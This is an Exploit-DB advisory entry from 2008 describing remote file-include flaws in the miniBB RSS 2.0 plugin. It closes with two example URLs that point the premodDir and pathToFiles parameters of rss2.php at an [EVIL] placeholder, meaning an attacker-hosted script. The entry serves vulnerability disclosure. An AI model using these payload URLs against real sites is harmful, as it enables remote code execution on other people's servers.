miniBB RSS 2.0 Plugin Multiple Remote File Include Vulnerabilities

2008-07-29T00:00:00
ID EDB-ID:32123
Type exploitdb
Reporter Ghost Hacker
Modified 2008-07-29T00:00:00

Description

miniBB RSS 2.0 Plugin Multiple Remote File Include Vulnerabilities. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/30421/info

The RSS plugin for miniBB is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues can allow an attacker to compromise the application and the underlying computer; other attacks are also possible. 

http://www.example.com/rss2.php?premodDir=[EVIL]
http://www.example.com/rss2.php?pathToFiles=[EVIL]